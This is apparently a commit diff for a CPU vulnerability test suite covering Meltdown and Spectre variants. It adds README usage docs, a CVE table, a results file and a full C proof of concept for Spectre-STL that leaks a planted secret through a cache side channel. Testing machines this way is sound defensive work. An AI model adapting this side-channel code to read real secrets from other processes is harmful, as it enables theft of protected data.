2020.10.17

1. add options "-s" and "-m"
2. fix a typo
3. fix a lost variable "stl"
4. update README.md
5. add a template of result.txt (simple result)

Author: github-3rr0r

README.md

@@ -12,6 +12,8 @@ This project is mainly based on project [Transient Fail](https://github.com/IAIK
 
 Linux with gcc and other dependent libraries.
 
+Developed on 5.4.0-47-generic #51~18.04.1-Ubuntu.
+
 #### CPU
 
 x86 and arm64 are supported.
@@ -20,44 +22,51 @@ x86 and arm64 are supported.
 
 Meltdown-like and Spectre-like vulnerabilities, more information will be also found on paper [A Systematic Evaluation of Transient Execution Attacks and Defenses](http://cc0x1f.net/publications/transient_sytematization.pdf).
 
+This vulnerablities are supported:
+
+| Systematic type name | CVE                                       | Description                                       |
+| -------------------- | ----------------------------------------- | ------------------------------------------------- |
+| Meltdown_AC          | -                                         | -                                                 |
+| Meltdown_BR          | -                                         | -                                                 |
+| Meltdown_DE          | -                                         | -                                                 |
+| Meltdown_GP          | CVE-2018-3640                             | Spectre V3a, rogue system register read           |
+| Meltdown_NM          | CVE-2018-3665                             | Lazy FP                                           |
+| Meltdown_P           | CVE-2018-3615/CVE-2018-3620/CVE-2018-3646 | Foreshadow, L1 terminal fault                     |
+| Meltdown_PK          | -                                         | -                                                 |
+| Meltdown_RW          |                                           | Spectre V1.2, write to page with read-only flag   |
+| Meltdown_SS          | -                                         | -                                                 |
+| Meltdown_UD          | -                                         | -                                                 |
+| Meltdown_US          | CVE-2017-5754                             | Meltdown, rogue data cache load                   |
+| Spectre_BTB          | CVE-2017-5715                             | Spectre V2, branch target injection               |
+| Spectre_PHT          | CVE-2017-5753                             | Spectre V1, bounds check bypass                   |
+| Spectre_RSB          | -                                         | -                                                 |
+| Spectre_STL          | CVE-2018-3693/CVE-2018-3639               | Spectre V1.1, NG and V4, speculative store bypass |
+
 ### Configurable features
 
 #### Select vulnerbilities
 
-This test suite allows you to select the vulnerabilities to be tested at first.
+This test suite allows you to select the vulnerabilities with option "-v".
 
-Following combinations are supported:
+Default option is "all" for testing all vulnerabilities.
 
-| Options     | Vulnerabilities to be tested    |
-| ----------- | ------------------------------- |
-| all         | All vulnerabilities             |
-| meltdown    | All Meltdown vulnerabilities    |
-| spectre     | All Spectre vulnerabilities     |
-| spectre_btb | All Spectre_BTB vulnerabilities |
-| spectre_pht | All Spectre_PHT vulnerabilities |
-| spectre_rsb | All Spectre_RSB vulnerabilities |
+#### Output valid PoCs
 
-You can also use multi_parameters to select specific vulnerabilities and separate them with spaces:
+You can enable and specify a markdown file as output of valid PoCs with option "-o"
 
-| Options | Vulnerabilities to be tested | Options    | Vulnerabilities to be tested |
-| ------- | ---------------------------- | ---------- | ---------------------------- |
-| ac      | Meltdown_AC                  | btb_sa_ip  | Spectre_BTB_sa_ip            |
-| br      | Meltdown_BR                  | btb_sa_oop | Spectre_BTB_sa_oop           |
-| de      | Meltdown_DE                  | btb_ca_ip  | Spectre_BTB_ca_ip            |
-| gp      | Meltdown_GP                  | btb_ca_oop | Spectre_BTB_ca_oop           |
-| nm      | Meltdown_NM                  | pht_sa_ip  | Spectre_PHT_sa_ip            |
-| p       | Meltdown_P                   | pht_sa_oop | Spectre_PHT_sa_oop           |
-| pk      | Meltdown_PK                  | pht_ca_ip  | Spectre_PHT_ca_ip            |
-| rw      | Meltdown_RW                  | pht_ca_oop | Spectre_PHT_ca_oop           |
-| ss      | Meltdown_SS                  | rsb_sa_ip  | Spectre_RSB_sa_ip            |
-| ud      | Meltdown_UD                  | rsb_sa_oop | Spectre_RSB_sa_oop           |
-| us      | Meltdown_US                  | rsb_ca_ip  | Spectre_RSB_ca_ip            |
-| stl     | Spectre_STL                  | rsb_ca_oop | Spectre_RSB_ca_oop           |
+#### Show simple options
 
-Default option is "all" for testing all vulnerabilities.
+You can show simple supported vulnerablities options with option "-s"
 
-#### Output valid PoCs
-#### To be added...
+#### Simple result output
+
+You can use option "-m" in test mode, simple result output will be available. 
+
+0 means vulnerable, 1 means not vulnerable, other values mean error or not tested.
+
+#### Other details
+
+You can use option "-h" to show all help messages or read the last part of this document.
 
 ## Repository Structure
 
@@ -103,6 +112,77 @@ chmod +x run.sh
 ./run.sh
 ```
 
+4. Run options
+##### Usage
+
+```
+Auto mode  :                    run.sh [-o filename] [-m]
+Manual mode:                    run.sh [-v "list of vulnerablities"] [-o filename] [-m]
+Show usage :                    run.sh -h
+Show supported vulnerablities:  run.sh -l [-m]
+```
+
+##### Modes
+
+```
+Auto mode will test all vulnerablities covered in this test suite.
+In manual mode, you can specify vulnerablities to be tested with options -v and followed by a list of vulnerablities.
+```
+
+##### Options
+
+```
+-o              enable and specify a markdown file as output of valid PoCs
+-v              list of vulnerablities to be tested. If not specified, all vuls will be test
+-h              show usage
+-l              show supported vulnerablities
+-s              show simple supported vulnerablities options
+-m              used in test mode, simple result output will be available. 
+                0 means vulnerable, 1 means not vulnerable, other values mean error or not tested.
+```
+
+##### Valid args of -v option
+
+You can select combination of vulnerabilities with following inputs:
+
+| Options     | Vulnerabilities to be tested    |
+| ----------- | ------------------------------- |
+| all         | All vulnerabilities             |
+| meltdown    | All Meltdown vulnerabilities    |
+| spectre     | All Spectre vulnerabilities     |
+| spectre_btb | All Spectre_BTB vulnerabilities |
+| spectre_pht | All Spectre_PHT vulnerabilities |
+| spectre_rsb | All Spectre_RSB vulnerabilities |
+
+You can also use multi_parameters to select specific vulnerabilities and separate them with spaces:
+
+| Options | Vulnerabilities to be tested | Options    | Vulnerabilities to be tested |
+| ------- | ---------------------------- | ---------- | ---------------------------- |
+| ac      | Meltdown_AC                  | btb_sa_ip  | Spectre_BTB_sa_ip            |
+| br      | Meltdown_BR                  | btb_sa_oop | Spectre_BTB_sa_oop           |
+| de      | Meltdown_DE                  | btb_ca_ip  | Spectre_BTB_ca_ip            |
+| gp      | Meltdown_GP                  | btb_ca_oop | Spectre_BTB_ca_oop           |
+| nm      | Meltdown_NM                  | pht_sa_ip  | Spectre_PHT_sa_ip            |
+| p       | Meltdown_P                   | pht_sa_oop | Spectre_PHT_sa_oop           |
+| pk      | Meltdown_PK                  | pht_ca_ip  | Spectre_PHT_ca_ip            |
+| rw      | Meltdown_RW                  | pht_ca_oop | Spectre_PHT_ca_oop           |
+| ss      | Meltdown_SS                  | rsb_sa_ip  | Spectre_RSB_sa_ip            |
+| ud      | Meltdown_UD                  | rsb_sa_oop | Spectre_RSB_sa_oop           |
+| us      | Meltdown_US                  | rsb_ca_ip  | Spectre_RSB_ca_ip            |
+|         |                              | rsb_ca_oop | Spectre_RSB_ca_oop           |
+|         |                              | stl        | Spectre_STL                  |
+Examples:
 ```shell
+run.sh
+    # Test all vulnerabilities.
+run.sh -m
+    # Test all vulnerabilities and save simple result to result.txt.
+run.sh -v "meltdown spectre_btb" -o report
+    # Test all Meltdown and all Spectre_BTB type vulnerabilities, and save successful PoCs to report.md.
+run.sh -v "meltdown spectre_btb" -o report -m
+    # Test all Meltdown and all Spectre_BTB type vulnerabilities, save simple result to result.txt, and successful PoCs to report.md.
+```
+
+```
 # This project was originally call Transient Execution Attack Test Suite, but the abbreviation was really cursed. I've also tried TAT, a cute name, but full name without "execution" seems unreasonable. So after careful consideration, I decided to use "TEApot" as the name of the project. Both "pot" and "suite" are containers for something. 
 ```

report.md

@@ -1109,3 +1109,110 @@ int main(int argc, char **argv)
 
 ```
 
+10. Spectre-STL
+```c
+#include <pthread.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/prctl.h>
+#include <seccomp.h>
+#include <linux/seccomp.h>
+
+#include "libcache/cache.h"
+#include "lib/global.h"
+
+// inaccessible (overwritten) secret
+#define SECRET "SECRETSS"
+#define OVERWRITE '#'
+
+char *data;
+
+char access_array(int x)
+{
+    // store secret in data
+    strcpy(data, SECRET);
+
+    // flushing the data which is used in the condition increases
+    // probability of speculation
+    mfence();
+    char **data_slowptr = &data;
+    char ***data_slowslowptr = &data_slowptr;
+    mfence();
+    flush(&x);
+    flush(data_slowptr);
+    flush(&data_slowptr);
+    flush(data_slowslowptr);
+    flush(&data_slowslowptr);
+    // ensure data is flushed at this point
+    mfence();
+
+    // overwrite data via different pointer
+    // pointer chasing makes this extremely slow
+    (*(*data_slowslowptr))[x] = OVERWRITE;
+
+    // data[x] should now be "#"
+    // uncomment next line to break attack
+    //mfence();
+    // Encode stale value in the cache
+    cache_encode(data[x]);
+}
+
+int main(int argc, char **argv)
+{
+    PREPARE();
+
+    printf("Spectre_STL Begins...\n");
+
+    data = malloc(128);
+    // store secret
+    strcpy(data, SECRET);
+
+    // Flush our shared memory
+    flush_shared_memory();
+
+    // nothing leaked so far
+    char leaked[sizeof(SECRET) + 1];
+    memset(leaked, ' ', sizeof(leaked));
+    leaked[sizeof(SECRET)] = 0;
+
+    int j = 0;
+    for (int i = 0; i < MAX_TRY_TIMES; i++)
+    {
+        // for every byte in the string
+        j = (j + 1) % sizeof(SECRET);
+
+        // overwrite value with X, then access
+        access_array(j);
+
+        mfence(); // avoid speculation
+        // Recover data from covert channel
+        cache_decode_array(leaked, j);
+    }
+    for (int i = 0; i < sizeof(SECRET) - 1; i++)
+    {
+        if (SECRET[i] == leaked[i])
+        {
+            passed_count++;
+        }
+    }
+    // puts(leaked);
+    int exit_result = 0;
+    if (passed_count > 0)
+    {
+        printf(ANSI_COLOR_RED "Spectre_STL: Vulnerable\n" ANSI_COLOR_RESET);
+        exit_result = EXIT_SUCCESS;
+    }
+    else
+    {
+        printf(ANSI_COLOR_GREEN "Spectre_STL: Not Vulnerable\n" ANSI_COLOR_RESET);
+        exit_result = EXIT_FAILURE;
+    }
+    printf("Spectre_STL done!\n\n");
+    exit(exit_result);
+}
+
+```
+

result.txt

@@ -0,0 +1,24 @@
+ac 1
+br 0
+de 1
+gp 1
+nm 1
+p 1
+pk 255
+rw 0
+ss 1
+ud 1
+us 0
+btb_sa_ip 0
+btb_sa_oop 1
+btb_ca_ip 1
+btb_ca_oop 1
+pht_sa_ip 0
+pht_sa_oop 0
+pht_ca_ip 0
+pht_ca_oop 0
+rsb_sa_ip 1
+rsb_sa_oop 0
+rsb_ca_ip 1
+rsb_ca_oop 1
+stl 0